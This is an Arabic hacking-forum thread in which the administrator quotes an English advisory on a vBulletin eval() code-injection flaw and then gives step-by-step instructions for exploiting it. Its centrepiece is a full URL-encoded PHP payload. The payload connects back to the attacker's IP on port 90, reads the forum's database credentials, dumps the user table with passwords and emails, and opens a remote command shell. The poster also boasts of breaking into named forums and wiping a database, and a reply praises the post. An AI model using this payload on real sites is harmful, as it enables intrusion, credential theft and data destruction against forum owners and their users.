منتدى سلام المهندس
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتدى سلام المهندس

منتدى سلام المهندس
 
الرئيسيةالرئيسية  البوابةالبوابة  أحدث الصورأحدث الصور  التسجيلالتسجيل  دخولدخول  

منتدى سلام المهندس :: قسم الهكر :: منتدى اختراق المواقع والمنتديات
 

 حركه حلوه تجربها في المنتدى vBulliten 115 & 113

اذهب الى الأسفل 
2 مشترك
كاتب الموضوعرسالة
سلام المهندس
المدير العام
المدير العام



عدد المساهمات : 192
تاريخ التسجيل : 17/09/2008

حركه حلوه تجربها في المنتدى vBulliten 115 & 113 Empty
مُساهمةموضوع: حركه حلوه تجربها في المنتدى vBulliten 115 & 113   حركه حلوه تجربها في المنتدى vBulliten 115 & 113 I_icon_minitimeالخميس أكتوبر 09, 2008 4:45 am

كلنا نعرف منتديات الفي بي ، وهذا النوع من المنتديات يحب يركبه قليلين الخبره في أغلب الأحيان ، وهذا المنتدى هو المعروف عندنا العرب بكثره ، وقبل كل شئ أحب اقول رائي أن شغلت إختراق المنتديات شئ بسيط ولا هو حق فلسفه ، إذا مكان فيه الحصول على الجذر والا بلاشي ، أنا أسمي الإختراق بعدم الوصول الى الجذر لعب عيال Smile

أكيد الكل حاول يخترق الفي بي ومالقي الا شئيين في مواقع الأمن ، الأول اللي كتبته الفرنسي (على ما أعتقد) Jouko Pynnonen والثاني يخص في الجافا وهذه خلوه بعدين

vBulletin (http://www.vbulletin.com) is a commonly used web forum
system written in PHP. One of its key features is use of templates,
which allow the board administrator to dynamically modify the look of
the board.

vBulletin templates are parsed with the eval() function. This could be
somewhat safe as long as the parameters to eval() are under strict
control. Unfortunately this is where vBulletin fails. With an URL
crafted in a certain way, a remote user may control the eval() parameters
and inject arbitrary PHP code to be executed.

A remote user may thus execute any PHP code and programs as the web
server user, typically "nobody", start an interactive shell and try to
elevate their privilege. The configuration files are accessible for the
web server so the user can in any case access the MySQL database
containing the forums and user information.

According to the authors the vulnerability exist in all versions of
vBulletin up to 1.1.5 and 2.0 beta 2. The bug does not involve buffer
overrun or other platform-dependant issues, so it's presumably
exploitable under any OS or platform.




DETAILS
=======

vBulletin templates are implemented in the following way: the
gettemplate() function in global.php is used to fetch a template from
database. The code is then passed to eval(). If we take index.php for
an example, there's this code:


if ($action=="faq") {
eval("echo dovars(\"".gettemplate("faq")."\");");
}


The dovars() function does some variable replacing, such as replace
<largefont> with <font size="10">.

The gettemplate() function is defined in global.php:


function gettemplate($templatename,$escape=1) {
// gets a template from the db or from the local cache
global $templatecache,$DB_site;

if ($templatecache[$templatename]!="") {
$template=$templatecache[$templatename];
} else {
$gettemp=$DB_site->query_first("SELECT template FROM template WHERE title='". addslashes($templatename)."'");
$template=$gettemp[template];
$templatecache[$templatename]=$template;
}

if ($escape==1) {
$template=str_replace("\"","\\\"",$template);
}
return $template;
}



For effectiveness the function implements a simple cache for template
strings. After fetching them from the database they're stored in the
templatecache[] array. This array is checked for the template before
doing the SQL query. Unfortunately the array is never initialized, so
a user can pass array contents in the URL, e.g.
(for simplicity not %-escaped)

http://www.site.url/index.php?action=faq&templatecache[faq]=hello+world

With this URL, you won't get the FAQ page, but just a blank page
with the words "hello world".

The eval() call above will execute

echo dovars("hello world");

As if this wouldn't be bad enough, a remote user may as well pass a
value containing quotation marks and other symbols. Quotation marks
aren't always escaped as seen in the code above, in which case
index.php could end up executing code like

echo dovars("hello"world");

This would produce a PHP error message due to unbalanced quotes. It
doesn't take a rocket scientist to figure out how a remote user could
execute arbitrary code from here, so further details about exploitation
aren't necessary. If your vBulletin board produces an error message
with an URL like the one above prefixed with a single quotation mark,
it's definitely vulnerable.

The above example works with the "Lite" version. The commercial versions
are vulnerable too, but details may differ. After a little experimenting
on the Jelsoft's test site I found some of the commercial versions also
have an eval() problem with URL redirecting, e.g.

http://www.site.url/member.php?action=login&username=myuser&password=mypass&url=hello"world

and a similar one in the Lite version:

http://www.site.url/search.php?action=simplesearch&query=searchthis&templatecache[standardredirect]=hello"world





تعرفون الكلام هذا ولا داعي لترجمه ، من الكلام هذا أنت ممكن ترسل أكواد خلف url تنفذ في السيرفر ، تضعها بدل الكلمه hello+world الغبيه ، جرب مثلا :

1- ركب في جهازك ملقم ويب أي ملقم تحبه ممكن تركب عليه vb 113 or 115
2- أفتح البورت 90 عندك في جهازك (طريقه فتح البورت تكون على مجازك)
3- أرسل الـ url هذا الى السيرفر

search.php3?action=simplesearch&query=searchthis&templatecache[standardredirect]="%29%3B%24fa="<%261";set_time_limit(substr("900",0,3));%24fp=fsockopen(substr("IP.IP.IP.IP",0,12),substr("90",0,2),%26%24errno,%26%24errstr,substr("900",0,3));if(!%24fp){}else{%24arr[200];fputs(%24fp,substr("vhak1.0,%20-d%20downloads%20database,or%20press%20return%20for%20command%20line",0,63));%24va=fgets(%24fp,3);fputs(%24fp,%24va);if(strlen(%24va)>1){include(substr("admin/config.php",0,16));include(substr("admin/config.php3",0,17));mysql_connect(substr("%24servername",0,strlen(%24servername)),substr("%24dbusername",0,strlen(%24dbusername)),substr("%24dbpassword",0,strlen(%24dbpassword)));%24currenta=mysql_db_query(substr("%24dbname",0,strlen(%24dbname)),substr("select%20*%20from%20user",0,18));while(%24res=mysql_fetch_array%20(%24currenta)){fputs(%24fp,"%24res[userid],");fputs(%24fp,"%24res[usergroupid],");fputs(%24fp,"%24res[password],");fputs(%24fp,"%24res[email],");fputs(%24fp,"%24res[username],");}echo(mysql_error());}while(!feof(%24fp)){unset(%24arr);%24str=exec(fgets(%24fp,substr("128",0,3)),%24arr);for(%24ir=substr("0",0,1);%24ir<sizeof(%24arr);%24ir%2B%2B){fputs(%24fp,%24arr[%24ir]);fputs(%24fp,%24va);}}fclose(%24fp);}die(vhak_finished_execution);echo%28"

By Kill -9

لاحظ IP.IP.IP.IP هذه تحط مكانها رقم الآي بي حقك ، ثم الاحظ بعدها وجود الرقم 12 وهذا تغيرها على طول رقم الآي بي ، مثلا 127.0.0.1 يكون طوله 9

ممكن أنت تخترع كود ثاني وترسله وتلاحظ أنه يتنفذ ، ممكن ترسل كود يسجل لك أدمين ، هذا مثل ما صار في arabteam2000.com (أصدقائي طبعا) من باب التنبيه ، وكمان صار في c4arab.com و طريق الإسلام و الثقافه ...وكثير من المنتديات ، بهدف التحذير وليس التخريب ، وواضح أنه عمل بسيط يحتاج لشويه من التفكير ، أعتقد أهليز زمان صار فيه ، ولكن مسحت الداتالبيس وهذا سهل للغايه

طريقه قديمه نوعا ما ، وحطيتها للي حب يجرب فقط !!

وأعذروني على الإملاء والنحو

ملاحظه أخيره : وهي عند ما تشبك مع السيرفر عن طريق البورت 90 أرسل
-d downloads
تنزل لك الداتبيس كلها ، وللأسف طلعت غير مشفره وهذا يدل على التخلف ، ولكن في الإصداره 2.2x شفرت ولكن كسرتها وقريبا أقول لك عنها
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://iraqiloveq.ahlamontada.net
انوار منسي
نائبة المديرالعام
نائبة المديرالعام



عدد المساهمات : 5162
تاريخ التسجيل : 06/10/2008
العمر : 61
الموقع : بغداد

حركه حلوه تجربها في المنتدى vBulliten 115 & 113 Empty
مُساهمةموضوع: رد: حركه حلوه تجربها في المنتدى vBulliten 115 & 113   حركه حلوه تجربها في المنتدى vBulliten 115 & 113 I_icon_minitimeالجمعة أكتوبر 10, 2008 12:31 pm
عاشت الايادي للابداع الروعه

تحياتي
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
حركه حلوه تجربها في المنتدى vBulliten 115 & 113
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدى سلام المهندس :: قسم الهكر :: منتدى اختراق المواقع والمنتديات-
انتقل الى: